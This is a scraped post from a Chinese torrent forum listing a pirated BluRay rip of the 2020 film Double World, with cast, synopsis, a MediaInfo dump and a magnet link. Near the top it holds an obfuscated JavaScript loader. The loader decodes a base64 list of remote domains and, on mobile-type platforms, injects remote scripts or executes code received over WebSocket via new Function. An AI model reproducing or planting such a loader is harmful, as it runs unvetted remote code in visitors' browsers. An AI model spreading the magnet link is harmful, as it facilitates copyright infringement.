征途[国语音轨/简繁字幕]Double.World.2020.BluRay.1080p.DTS-HD.MA.5.1.x265.10bit-迅雷下载 8.58GB

版主小s 21天前 202

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x49\x6e\x58\x62\x4c\x54\x4c\x79\x4d\x72']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('uawei')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 征途 / Double World

◎年 代 2020

◎产 地 中国大陆

◎类 别 动作 / 奇幻 / 冒险

◎语 言 汉语普通话

◎上映日期 2020-07-24(中国大陆网络)

◎IMDb链接 https://www.imdb.com/title/tt10508838/

◎豆瓣评分 5.1/10 (20880人评价)

◎豆瓣链接 https://movie.douban.com/subject/26705567/

◎片 长 110分钟

◎导 演 陈德森 Teddy Chan (id:1313007)

◎编 剧 刘奋斗 Fendou Liu (id:1275174)

文宁 Ning Wen (id:1327359)

◎演 员 刘宪华 Henry Lau (id:1335689)

何润东 Peter Ho (id:1050590)

林辰涵 Chenhan Lin (id:1402470)

蒋璐霞 Luxia Jiang (id:1313597)

罗子溢 Chung Him Law (id:1313369)

胡明 Ming Hu (id:1275967)

许明虎 Tiger Xu (id:1325510)

郑浩南 Mark Cheng (id:1028605)

施诗 Shi Shi (id:1317921)

张宁江 Ningjiang Zhang (id:1321998)

王延龙 Yanlong Wang (id:1418378)

杜晓帆 Xiaofan Du (id:1352782)

李熙瑜 Xiyu Li (id:1418379)

李熙蕾 Xilei Li (id:1418381)

许翔 Xiang Xu (id:1425729)

陈奕名 Yiming Chen (id:1404206)

艾米 Aimee (id:1396876)

都桂宇 Guiyu Du (id:1450855)

郑保瑞 Pou-Soi Cheang (id:1274240)

杨涛 Tao Yang (id:1301418)

徐建 Eric Xu (id:1382406)

魏明 Allen Wei (id:1424810)

李帅 Shuai Li (id:1430937)

董玮 Wai Tung (id:1299617)

◎标 签 游戏改编 / 中国 / 动作 / 奇幻 / 古装 / 魔幻 / 3D / 冒险

◎简 介

故事发生在虚构的中原大陆。十国之中,南赵国与北燕国比邻而居。为了防御日益强大的北燕,南赵举办比武大会,选拔将才。消息传到偏僻的清源村,村民东一龙想成为家族的举旗人,代表清源村家族出赛,村民们却质疑他的资格,经过一番努力,一龙终于踏上了与武士楚魂的征途……

◎获奖情况 (共2项)

第39届香港电影金像奖 (2020)

最佳动作设计(提名)

└──董玮 (id:1299617)

最佳视觉效果(提名)

└──李帅 (id:1430937)

└──魏明 (id:1424810)

└──徐建 (id:1382406)

  1. General

  2. Unique ID : 201574225996613571830174447359629053529 (0x97A5C8A638FD3FF24BE5769AB0C9CE59)

  3. Complete name : [email protected]QDDQ.COM.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 8.58 GiB

  7. Duration : 1 h 50 min

  8. Overall bit rate mode : Variable

  9. Overall bit rate : 11.2 Mb/s

  10. Encoded date : UTC 2021-07-11 04:22:08

  11. Writing application : mkvmerge v49.0.0 ('Sick Of Losing Soulmates') 64-bit

  12. Writing library : libebml v1.4.0 + libmatroska v1.6.1


  13. Video

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : Main [email protected]@High

  18. Codec ID : V_MPEGH/ISO/HEVC

  19. Duration : 1 h 50 min

  20. Bit rate : 7 142 kb/s

  21. Width : 1 920 pixels

  22. Height : 806 pixels

  23. Display aspect ratio : 2.40:1

  24. Frame rate mode : Constant

  25. Frame rate : 23.976 (24000/1001/53354) FPS

  26. Color space : YUV

  27. Chroma subsampling : 4:2:0

  28. Bit depth : 10 bits

  29. Bits/(Pixel*Frame) : 0.192

  30. Stream size : 5.49 GiB (64%)

  31. Title : HEVC, [email protected]@High, 24/1.001 fps @ 8042 kbps

  32. Writing library : x265 3.4+14-gd419c7152:[Windows][GCC 10.2.0][64 bit] 10bit

  33. Encoding settings : cpuid=533541111039 / frame-threads=4 / numa-pools=16 / wpp / pmode / pme / no-psnr / no-ssim / log-level=2 / input-csp=1 / input-res=1920x806 / interlace=0 / total-frames=158428 / level-idc=51 / high-tier=1 / uhd-bd=0 / ref=5 / no-allow-non-conformance / no-repeat-headers / annexb / no-aud / no-hrd / info / hash=0 / no-temporal-layers / open-gop / min-keyint=24 / keyint=240 / gop-lookahead=0 / bframes=6 / b-adapt=2 / b-pyramid / bframe-bias=0 / rc-lookahead=40 / lookahead-slices=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / no-splice / no-intra-refresh / ctu=32 / min-cu-size=8 / no-rect / no-amp / max-tu-size=32 / tu-inter-depth=3 / tu-intra-depth=3 / limit-tu=4 / rdoq-level=2 / dynamic-rd=0.00 / no-ssim-rd / signhide / no-tskip / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-merge=4 / limit-refs=1 / limit-modes / me=3 / subme=4 / merange=25 / temporal-mvp / no-frame-dup / no-hme / weightp / weightb / no-analyze-src-pics / deblock=-3:-3 / no-sao / no-sao-non-deblock / rd=6 / selective-sao=0 / no-early-skip / rskip / no-fast-intra / no-tskip-fast / no-cu-lossless / b-intra / no-splitrd-skip / rdpenalty=0 / psy-rd=2.00 / psy-rdoq=1.00 / no-rd-refine / no-lossless / cbqpoffs=0 / crqpoffs=0 / rc=crf / crf=17.0 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / vbv-maxrate=80000 / vbv-bufsize=80000 / vbv-init=0.9 / crf-max=0.0 / crf-min=0.0 / ipratio=1.40 / pbratio=1.30 / aq-mode=2 / aq-strength=0.85 / cutree / zone-count=0 / no-strict-cbr / qg-size=32 / no-rc-grain / qpmax=69 / qpmin=0 / no-const-vbv / sar=1 / overscan=0 / videoformat=5 / range=0 / colorprim=1 / transfer=1 / colormatrix=1 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / no-scenecut-aware-qpconformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0

  34. Language : English

  35. Default : Yes

  36. Forced : No

  37. Color range : Limited

  38. Color primaries : BT.709

  39. Transfer characteristics : BT.709

  40. Matrix coefficients : BT.709


  41. Audio

  42. ID : 2

  43. Format : DTS XLL

  44. Format/Info : Digital Theater Systems

  45. Commercial name : DTS-HD Master Audio

  46. Codec ID : A_DTS

  47. Duration : 1 h 50 min

  48. Bit rate mode : Variable

  49. Bit rate : 3 950 kb/s

  50. Channel(s) : 6 channels

  51. Channel layout : C L R Ls Rs LFE

  52. Sampling rate : 48.0 kHz

  53. Frame rate : 93.750 FPS (512 SPF)

  54. Bit depth : 24 bits

  55. Compression mode : Lossless

  56. Stream size : 3.04 GiB (35%)

  57. Title : Mandarin DTS-HD Master Audio 5.1 @ 3950 kbps

  58. Language : Chinese

  59. Default : Yes

  60. Forced : No


  61. Text #1

  62. ID : 3

  63. Format : PGS

  64. Codec ID : S_HDMV/PGS

  65. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  66. Duration : 1 h 43 min

  67. Bit rate : 27.1 kb/s

  68. Count of elements : 1992

  69. Stream size : 20.1 MiB (0%)

  70. Title : Eng/SUP

  71. Language : English

  72. Default : No

  73. Forced : No


  74. Text #2

  75. ID : 4

  76. Format : PGS

  77. Codec ID : S_HDMV/PGS

  78. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  79. Duration : 1 h 43 min

  80. Bit rate : 15.4 kb/s

  81. Count of elements : 1968

  82. Stream size : 11.4 MiB (0%)

  83. Title : Chs/SUP 简体

  84. Language : Chinese

  85. Default : Yes

  86. Forced : No


  87. Text #3

  88. ID : 5

  89. Format : PGS

  90. Codec ID : S_HDMV/PGS

  91. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  92. Duration : 1 h 43 min

  93. Bit rate : 15.7 kb/s

  94. Count of elements : 2049

  95. Stream size : 11.5 MiB (0%)

  96. Title : Cht/SUP 繁体

  97. Language : Chinese

  98. Default : No

  99. Forced : No


  100. Menu

  101. 00:00:00.000 : en:第 01 章

  102. 00:09:33.239 : en:第 02 章

  103. 00:18:44.123 : en:第 03 章

  104. 00:25:19.435 : en:第 04 章

  105. 00:37:15.817 : en:第 05 章

  106. 00:46:59.650 : en:第 06 章

  107. 00:58:39.516 : en:第 07 章

  108. 01:09:37.757 : en:第 08 章

  109. 01:18:31.206 : en:第 09 章

  110. 01:26:14.503 : en:第 10 章

  111. 01:34:20.446 : en:第 11 章

  112. 01:42:03.868 : en:第 12 章



TAGS 动作 奇幻 冒险

磁力链:
  • magnet:?xt=urn:btih:68C8916DE2F01A69D0A2AE6596C2262772C56DB4
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回